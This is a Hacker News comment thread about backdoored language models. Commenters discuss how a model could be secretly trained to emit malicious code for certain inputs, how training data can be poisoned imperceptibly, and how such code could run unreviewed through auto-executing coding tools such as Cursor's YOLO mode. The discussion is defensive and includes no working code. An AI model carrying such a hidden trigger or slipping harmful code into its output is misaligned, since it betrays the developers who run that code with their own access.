Hacker News new | ask | show | jobs
by grahamgooch 486 days ago
Curious what is angle here -
3 comments

Most people will hardly read what the LLM spits out after 3 hours of use and execute the code. You now are running potentially harmful code with the user's level access which could be root level; potentially in a company environment, vpn etc. It's really scary, because at first glance it will look 100% legitimate.
Your neural network (LLM or otherwise) could be undetectably backdoored in a way that makes it provide malicious outputs for specific inputs.

Right now nobody really trusts LLM output anyway, so the immediate harm is small. But as we start using NNs for more and more, this kind of attack will become a problem.

I think this will be good for (actually) open source models, including training data. Because that will be the only way to confirm the model isn't hijacked
But how would you confirm it if there’s no ‚reproducible build‘ and you don’t have the hardware to reproduce?
That's the point, there needs to be a reproducible model. But I don't know how well that really prevents this case. You can hide all kinds of things in terabytes of training data.
Most ai models will probably shift to mixture of experts. Which has small models.

So maybe with small models + reproducible builds + training data , it can be harder to hide things.

I am wondering if there could be a way to create a reproducible build of training data as well (ie. Which websites it scraped , maybe archiving them as it is?) and providing the archived link and then people can fact check those links and the more links are reviewed the more trustworthy a model is?

If we are using ai in defense systems. You kind of need trustworthy, so even if the process is tiresome , maybe there is incentive now?

Or maybe we shouldn't use ai in defense systems and kind of declare all closed ai without reproducible build , without training data , without weights , without how they gather data , a fundamental threat to using it.

> So maybe with small models + reproducible builds + training data , it can be harder to hide things.

Eh, not quite. Then you're gonna have the problem of needing to test/verify a lot of smaller models, which makes it harder because now you've got to do similar (although maybe not exactly the same) thing, lots of times.

> I am wondering if there could be a way to create a reproducible build of training data ... then people can fact check those links and the more links are reviewed the more trustworthy a model is?

It is possible to make poisoned training data where the differences are not perceptible to human eyes. Human review isn't a solution in all cases (maybe some, but not all).

> If we are using ai in defense systems. You kind of need trustworthy, so even if the process is tiresome , maybe there is incentive now?

DARPA has funded a lot of research on this over the last 10 years. There's been incentive for a long while.

> Or maybe we shouldn't use ai in defense systems

Do not use an unsecured, untrusted, unverified dependency in any system in which you need trust. So, yes, avoid safety and security uses cases (that do not have manual human review where the person is accountable for making the decision).

well, not everyone has hardware to build large software anyway. like chrome requires 20+ cores and 64+ gb ram

- https://chromium.googlesource.com/chromium/src/+/main/docs/w...

This also incentivizes them to produce reproducible builds. So training data + reproducible build
maybe through some distributed system like BOINC?
Supply chain attacks, I'd reckon.

Get malicious code stuffed into Cursor (or similar)-built applications -- doesn't even have to fail static scanning, just got to open the door.

Sort of like the xz debacle.

It's even better if you have anything automated executing your tests and whatnot (like popular VSCode plugins showing a nice graphical view of which errors arise from where through your local repo). You could own a developer's machine before they had the time to vet the offending code.
Yeah esp Cursor YOLO mode (auto write code and run commands) is getting very popular

https://forum.cursor.com/t/yolo-mode-is-amazing/36262

What's that game when you take damage it rm - f random files in your filesystem?
There's two games similar to that that I know of (though you're probably thinking of the first):

* https://en.wikipedia.org/wiki/Lose/Lose - Each alien represents a file on your computer. If you kill an alien, the game permanently deletes the file associated with it.

* https://psdoom.sourceforge.net/ - a hack of Doom where each monster represents a running process. Kill the monster, kill(1) the process.

That's called not having a backup of your physical storage medium: when it takes damage, files get gone!
I’d love to know this game if you remember please share!
sibling mentioned psdoom and "Lose", i've heard of both, but i was thinking of "Lose" specifically.
Yeah that would be the most obvious "real" exploit (on the code generation side)